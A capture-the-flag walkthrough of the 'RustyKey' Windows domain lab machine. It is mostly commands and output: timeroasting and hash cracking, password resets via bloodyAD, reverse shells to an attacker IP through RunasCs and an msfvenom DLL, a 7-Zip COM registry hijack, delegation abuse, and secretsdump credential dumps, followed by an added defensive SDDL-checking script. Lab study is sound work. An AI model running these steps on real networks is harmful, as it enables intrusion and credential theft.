RustyKey
#hard #windows
Last updated
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-11-20 21:16:09Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: rustykey.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: rustykey.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-11-20T21:16:24
|_ start_date: N/A
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 51928/tcp): CLEAN (Couldn't connect)
| Check 2 (port 16739/tcp): CLEAN (Couldn't connect)
| Check 3 (port 63867/udp): CLEAN (Timeout)
| Check 4 (port 17002/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: 7h59m59s

sudo vi /etc/hosts

nxc smb 10.10.11.75
SMB 10.10.11.75 445 10.10.11.75 [*] x64 (name:10.10.11.75) (domain:10.10.11.75) (signing:True) (SMBv1:False) (NTLM:False)

sudo vi /etc/hosts

sudo timedatectl set-ntp false
sudo ntpdate 10.10.11.75

nxc smb dc.rustykey.htb -u 'rr.parker' -p '8#t5HE8L!W3A' -k --generate-krb5-file rustykey.krb
SMB dc.rustykey.htb 445 dc [*] x64 (name:dc) (domain:rustykey.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB dc.rustykey.htb 445 dc [+] rustykey.htb\rr.parker:8#t5HE8L!W3A

sudo cp rustykey.krb /etc/krb5.conf

rusthound-ce -d rustykey.htb -u rr.parker -p '8#t5HE8L!W3A'

MATCH p=(source)-[r]->(target)
WHERE (source:Computer OR source:User)
AND type(r) <> 'MemberOf'
RETURN p

nxc smb 10.10.11.75 -M timeroast
SMB 10.10.11.75 445 10.10.11.75 [*] x64 (name:10.10.11.75) (domain:10.10.11.75) (signing:True) (SMBv1:False) (NTLM:False)
TIMEROAST 10.10.11.75 445 10.10.11.75 [*] Starting Timeroasting...

cat hashes/rusty-time | awk '{print $5}' > hashes/t
mv hashes/t hashes/rusty-time

hashcat rusty-time /usr/share/wordlists/rockyou.txt --user

hashcat rusty-time --user --show
1125:$sntp-ms$0b64d18225a20ad4d922a71047a51061$1c0111e900000000000a5b7b4c4f434cecc9d6165d9ca918e1b8428bffbfcd0aecca4eb1458c0709ecca4eb1458c6d61:Rusty88!

cat creds.txt
IT-COMPUTER3$:Rusty88!
S-1-5-21-3316070415-896458127-4139322052-1125

nxc smb dc.rustykey.htb -u IT-COMPUTER3$ -p 'Rusty88!' -k
SMB dc.rustykey.htb 445 dc [*] x64 (name:dc) (domain:rustykey.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB dc.rustykey.htb 445 dc [+] rustykey.htb\IT-COMPUTER3$:Rusty88!

bloodyAD -d rustykey.htb --host dc.rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' -k add groupMember HelpDesk 'IT-COMPUTER3$'
[+] IT-COMPUTER3$ added to HelpDesk

bloodyAD -d rustykey.htb --host dc.rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' -k remove groupMember 'Protected Objects' 'IT'
[+] IT removed from Protected Objects

bloodyAD -d rustykey.htb --host dc.rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' -k set password bb.morgan 'Password!'
[+] Password changed successfully!

getTGT.py 'rustykey.htb/bb.morgan:Password!'
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in bb.morgan.ccache

KRB5CCNAME=bb.morgan.ccache evil-winrm -i dc.rustykey.htb -r rustykey.htb
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method 'quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\bb.morgan\Documents> cd ..
*Evil-WinRM* PS C:\Users\bb.morgan> cd Desktop
*Evil-WinRM* PS C:\Users\bb.morgan\Desktop> dir
Directory: C:\Users\bb.morgan\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 6/4/2025 9:15 AM 1976 internal.pdf
-ar--- 11/21/2025 10:02 AM 34 user.txt
*Evil-WinRM* PS C:\Users\bb.morgan\Desktop> type user.txt

*Evil-WinRM* PS C:\Users\bb.morgan\Desktop> cd \progra~1
*Evil-WinRM* PS C:\Program Files> dir
Directory: C:\Program Files
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 12/26/2024 8:24 PM 7-Zip
d----- 12/26/2024 4:28 PM Common Files
d----- 6/24/2025 9:59 AM internet explorer
d----- 7/24/2025 1:09 AM VMware
d-r--- 5/30/2025 3:02 PM Windows Defender
d----- 6/24/2025 9:59 AM Windows Defender Advanced Threat Protection
d----- 11/5/2022 12:03 PM Windows Mail
d----- 6/5/2025 7:54 AM Windows Media Player
d----- 9/15/2018 12:19 AM Windows Multimedia Platform
d----- 9/15/2018 12:28 AM windows nt
d----- 11/5/2022 12:03 PM Windows Photo Viewer
d----- 9/15/2018 12:19 AM Windows Portable Devices
d----- 9/15/2018 12:19 AM Windows Security
d----- 9/15/2018 12:19 AM WindowsPowerShell

*Evil-WinRM* PS C:\Program Files> reg query HKCR\CLSID /s /f "zip"
HKEY_CLASSES_ROOT\CLSID\{23170F69-40C1-278A-1000-000100020000}
(Default) REG_SZ 7-Zip Shell Extension
HKEY_CLASSES_ROOT\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32
(Default) REG_SZ C:\Program Files\7-Zip\7-zip.dll
HKEY_CLASSES_ROOT\CLSID\{888DCA60-FC0A-11CF-8F0F-00C04FD7D062}
(Default) REG_SZ Compressed (zipped) Folder SendTo Target
FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\system32\zipfldr.dll,-10226
HKEY_CLASSES_ROOT\CLSID\{888DCA60-FC0A-11CF-8F0F-00C04FD7D062}\DefaultIcon
(Default) REG_EXPAND_SZ %SystemRoot%\system32\zipfldr.dll
HKEY_CLASSES_ROOT\CLSID\{888DCA60-FC0A-11CF-8F0F-00C04FD7D062}\InProcServer32
(Default) REG_EXPAND_SZ %SystemRoot%\system32\zipfldr.dll
HKEY_CLASSES_ROOT\CLSID\{b8cdcb65-b1bf-4b42-9428-1dfdb7ee92af}
(Default) REG_SZ Compressed (zipped) Folder Context Menu
HKEY_CLASSES_ROOT\CLSID\{b8cdcb65-b1bf-4b42-9428-1dfdb7ee92af}\InProcServer32
(Default) REG_EXPAND_SZ %SystemRoot%\system32\zipfldr.dll
HKEY_CLASSES_ROOT\CLSID\{BD472F60-27FA-11cf-B8B4-444553540000}
(Default) REG_SZ Compressed (zipped) Folder Right Drag Handler
HKEY_CLASSES_ROOT\CLSID\{BD472F60-27FA-11cf-B8B4-444553540000}\InProcServer32
(Default) REG_EXPAND_SZ %SystemRoot%\system32\zipfldr.dll
HKEY_CLASSES_ROOT\CLSID\{E88DCCE0-B7B3-11d1-A9F0-00AA0060FA31}\DefaultIcon
(Default) REG_EXPAND_SZ %SystemRoot%\system32\zipfldr.dll
HKEY_CLASSES_ROOT\CLSID\{E88DCCE0-B7B3-11d1-A9F0-00AA0060FA31}\InProcServer32
(Default) REG_EXPAND_SZ %SystemRoot%\system32\zipfldr.dll
HKEY_CLASSES_ROOT\CLSID\{ed9d80b9-d157-457b-9192-0e7280313bf0}
(Default) REG_SZ Compressed (zipped) Folder DropHandler
HKEY_CLASSES_ROOT\CLSID\{ed9d80b9-d157-457b-9192-0e7280313bf0}\InProcServer32
(Default) REG_EXPAND_SZ %SystemRoot%\system32\zipfldr.dll
End of search: 14 match(es) found.

*Evil-WinRM* PS C:\Program Files> Get-Acl "Registry::HKCR\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32" | fl
Path : Microsoft.PowerShell.Core\Registry::HKCR\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32
Owner : BUILTIN\Administrators
Group : RUSTYKEY\Domain Users
Access : APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadKey
BUILTIN\Administrators Allow FullControl
CREATOR OWNER Allow FullControl
RUSTYKEY\Support Allow FullControl
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
BUILTIN\Users Allow ReadKey
Audit :
Sddl : O:BAG:DUD:AI(A;CIID;KR;;;AC)(A;ID;KA;;;BA)(A;CIIOID;KA;;;CO)(A;CIID;KA;;;S-1-5-21-3316070415-896458127-4139322052-1132)(A;CIID;KA;;;SY)(A;CIIOID;KA;;;BA)(A;CIID;KR;;;BU)

bloodyAD -d rustykey.htb --host dc.rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' -k remove groupMember 'Protected Objects' 'Support'
[+] Support removed from Protected Objects

bloodyAD -d rustykey.htb --host dc.rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' -k set password ee.reed 'Password!'
[+] Password changed successfully!

python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

*Evil-WinRM* PS C:\Program Files> cd \programdata
*Evil-WinRM* PS C:\programdata> wget http://10.10.14.136:8000/RunasCs.exe -o Runascs.exe

rlwrap nc -lnvp 9001
Listening on 0.0.0.0 9001

*Evil-WinRM* PS C:\programdata> .\Runascs.exe ee.reed 'Password!' powershell -r 10.10.14.136:9001

rlwrap nc -lnvp 9001
Listening on 0.0.0.0 9001
Connection received on 10.10.11.75 53111
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Windows\system32>

msfvenom -p windows/x64/shell_reverse_tcp -f dll -o rev.dll LHOST=10.10.14.136 LPORT=1111

python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

*Evil-WinRM* PS C:\programdata> wget http://10.10.14.136:8000/rev.dll -o rev.dll

PS C:\Windows\system32> Set-ItemProperty "Registry::HKCR\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32" -Name "(default)" -Value "C:\ProgramData\rev.dll"
Set-ItemProperty "Registry::HKCR\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32" -Name "(default)" -Value "C:\ProgramData\rev.dll"

rlwrap nc -lnvp 1111
Listening on 0.0.0.0 1111

rlwrap nc -lnvp 1111
Listening on 0.0.0.0 1111
Connection received on 10.10.11.75 55806
Microsoft Windows [Version 10.0.17763.7434]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows>

C:\Windows>powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Windows> Set-ADComputer DC -PrincipalsAllowedToDelegateToAccount IT-COMPUTER3$
Set-ADComputer DC -PrincipalsAllowedToDelegateToAccount IT-COMPUTER3$

PS C:\Windows> Get-ADComputer DC -Properties PrincipalsAllowedToDelegateToAccount
Get-ADComputer DC -Properties PrincipalsAllowedToDelegateToAccount
DistinguishedName : CN=DC,OU=Domain Controllers,DC=rustykey,DC=htb
DNSHostName : dc.rustykey.htb
Enabled : True
Name : DC
ObjectClass : computer
ObjectGUID : dee94947-219e-4b13-9d41-543a4085431c
PrincipalsAllowedToDelegateToAccount : {CN=IT-Computer3,OU=Computers,OU=IT,DC=rustykey,DC=htb}
SamAccountName : DC$
SID : S-1-5-21-3316070415-896458127-4139322052-1000
UserPrincipalName :

getST.py 'rustykey.htb/IT-COMPUTER3$:Rusty88!' -k -spn 'cifs/DC.rustykey.htb' -impersonate backupadmin
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating backupadmin
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in backupadmin@cifs_DC.rustykey.htb@RUSTYKEY.HTB.ccache

KRB5CCNAME=backupadmin\@cifs_DC.rustykey.htb\@RUSTYKEY.HTB.ccache secretsdump.py -k -no-pass 'rustykey.htb/backupadmin@dc.rustykey.htb'
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x94660760272ba2c07b13992b57b432d4
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e3aac437da6f5ae94b01a6e5347dd920:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
RUSTYKEY\DC$:plain_password_hex:0c7fbe96b20b5afd1da58a1d71a2dbd6ac75b42a93de3c18e4b7d448316ca40c74268fb0d2281f46aef4eba9cd553bbef21896b316407ae45ef212b185b299536547a7bd796da250124a6bb3064ae48ad3a3a74bc5f4d8fbfb77503eea0025b3194af0e290b16c0b52ca4fecbf9cfae6a60b24a4433c16b9b6786a9d212c7aaefefa417fe33cc7f4dcbe354af5ce95f407220bada9b4d841a3aa7c6231de9a9ca46a0621040dc384043e19800093303e1485021289d8719dd426d164e90ee3db3914e3d378cc9e80560f20dcb64b488aa468c1b71c2bac3addb4a4d55231d667ca4ba2ad36640985d9b18128f7755b25
RUSTYKEY\DC$:aad3b435b51404eeaad3b435b51404ee:b266231227e43be890e63468ab168790:::
[*] DefaultPassword
RUSTYKEY\Administrator:Rustyrc4key#!
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:f7a351e12f70cc177a1d5bd11b28ac26:::
[*] Cleaning up...
[*] Stopping service RemoteRegistry
[-] SCMR SessionError: code: 0x41b - ERROR_DEPENDENT_SERVICES_RUNNING - A stop control has been sent to a service that other running services are dependent on.
[*] Cleaning up...
[*] Stopping service RemoteRegistry

nxc smb 10.10.11.75 -u administrator -H f7a351e12f70cc177a1d5bd11b28ac26 -k
SMB 10.10.11.75 445 dc [*] x64 (name:dc) (domain:rustykey.htb) (signing:True) (SMBv1:None) (NTLM:False)
SMB 10.10.11.75 445 dc [+] rustykey.htb\administrator:f7a351e12f70cc177a1d5bd11b28ac26 (Pwn3d!)

nxc smb 10.10.11.75 -u administrator -p 'Rustyrc4key#!' -k
SMB 10.10.11.75 445 dc [*] x64 (name:dc) (domain:rustykey.htb) (signing:True) (SMBv1:None) (NTLM:False)
SMB 10.10.11.75 445 dc [+] rustykey.htb\administrator:Rustyrc4key#! (Pwn3d!)

psexec.py -k 'rustykey.htb/administrator:Rustyrc4key#!@dc.rustykey.htb'
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
[*] Requesting shares on dc.rustykey.htb.....
[*] Found writable share ADMIN$
[*] Uploading file AiKNtguE.exe
[*] Opening SVCManager on dc.rustykey.htb.....
[*] Creating service radZ on dc.rustykey.htb.....
[*] Starting service radZ.....
[-] CCache file is not found. Skipping...
[-] CCache file is not found. Skipping...
[!] Press help for extra shell commands
[-] CCache file is not found. Skipping...
Microsoft Windows [Version 10.0.17763.7434]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> cd \users\administrator\desktop
C:\Users\Administrator\Desktop> dir
Volume in drive C has no label.
Volume Serial Number is 00BA-0DBE
Directory of C:\Users\Administrator\Desktop
06/24/2025 09:00 AM <DIR> .
06/24/2025 09:00 AM <DIR> ..
11/21/2025 10:02 AM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 3,493,490,688 bytes free
C:\Users\Administrator\Desktop> type root.txt
a717303dfa6f6e084fb3a5bca618731c
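
The Get-Acl output earlier on this page lists RUSTYKEY\Support with FullControl on the 7-Zip shell extension's InprocServer32 key (the ACE for the SID ending in -1132 in the Sddl line), which is what allowed the Set-ItemProperty change. As an added example that is not part of the original write-up, the Python below parses a registry key SDDL string and reports allow ACEs that give write-capable rights to SIDs outside a trusted set; the `TRUSTED` set, the function names and `HARDENED_SDDL` are assumptions made for this illustration.

```python
import re

# SDDL rights tokens that can appear in a registry key ACE, as access-mask bits.
RIGHTS = {
    "GA": 0x10000000, "GX": 0x20000000, "GW": 0x40000000, "GR": 0x80000000,
    "SD": 0x00010000, "RC": 0x00020000, "WD": 0x00040000, "WO": 0x00080000,
    "KA": 0x000F003F, "KR": 0x00020019, "KW": 0x00020006, "KX": 0x00020019,
    "CC": 0x01, "DC": 0x02, "LC": 0x04, "SW": 0x08, "RP": 0x10, "WP": 0x20,
}

# Bits that let a principal repoint the key's values or take control of its ACL.
WRITE_BITS = {
    0x00000002: "SetValue",
    0x00000004: "CreateSubKey",
    0x00010000: "Delete",
    0x00040000: "WriteDac",
    0x00080000: "WriteOwner",
    0x10000000: "GenericAll",
    0x40000000: "GenericWrite",
}

# Assumption: the only principals expected to hold write access under HKCR\CLSID.
TRUSTED = {
    "BA", "S-1-5-32-544",  # BUILTIN\Administrators
    "SY", "S-1-5-18",      # NT AUTHORITY\SYSTEM
    "S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464",  # TrustedInstaller
}

# SDDL as printed by Get-Acl on this page for the 7-Zip InprocServer32 key.
PAGE_SDDL = ("O:BAG:DUD:AI(A;CIID;KR;;;AC)(A;ID;KA;;;BA)(A;CIIOID;KA;;;CO)"
             "(A;CIID;KA;;;S-1-5-21-3316070415-896458127-4139322052-1132)"
             "(A;CIID;KA;;;SY)(A;CIIOID;KA;;;BA)(A;CIID;KR;;;BU)")

# Constructed sample: the same DACL with the non-default ACE removed.
HARDENED_SDDL = PAGE_SDDL.replace(
    "(A;CIID;KA;;;S-1-5-21-3316070415-896458127-4139322052-1132)", "")


def parse_rights(field):
    """Turn an SDDL rights field (hex or two-letter tokens) into an access mask."""
    if field.lower().startswith("0x"):
        return int(field, 16)
    mask = 0
    for i in range(0, len(field), 2):
        token = field[i:i + 2]
        if token not in RIGHTS:
            raise ValueError(f"unknown SDDL rights token: {token!r}")
        mask |= RIGHTS[token]
    return mask


def risky_aces(sddl, trusted=TRUSTED):
    """Return allow ACEs in the DACL that grant write-capable rights to untrusted SIDs."""
    dacl = re.search(r"D:[A-Z]*((?:\([^()]*\))+)", sddl)
    if dacl is None:
        return []
    findings = []
    for ace in re.findall(r"\(([^()]*)\)", dacl.group(1)):
        fields = ace.split(";")
        if len(fields) < 6:
            raise ValueError(f"malformed ACE: {ace!r}")
        ace_type, flags, rights, sid = fields[0], fields[1], fields[2], fields[5]
        flag_set = {flags[i:i + 2] for i in range(0, len(flags), 2)}
        # Skip deny/audit ACEs, inherit-only ACEs (they do not apply to this key)
        # and principals on the trusted list.
        if ace_type != "A" or "IO" in flag_set or sid in trusted:
            continue
        mask = parse_rights(rights)
        granted = [name for bit, name in WRITE_BITS.items() if mask & bit]
        if granted:
            # inherited=True means the ACE is defined on a parent key; fix it there.
            findings.append({"sid": sid, "mask": mask, "write_rights": granted,
                             "inherited": "ID" in flag_set})
    return findings


if __name__ == "__main__":
    for finding in risky_aces(PAGE_SDDL):
        print(finding)
```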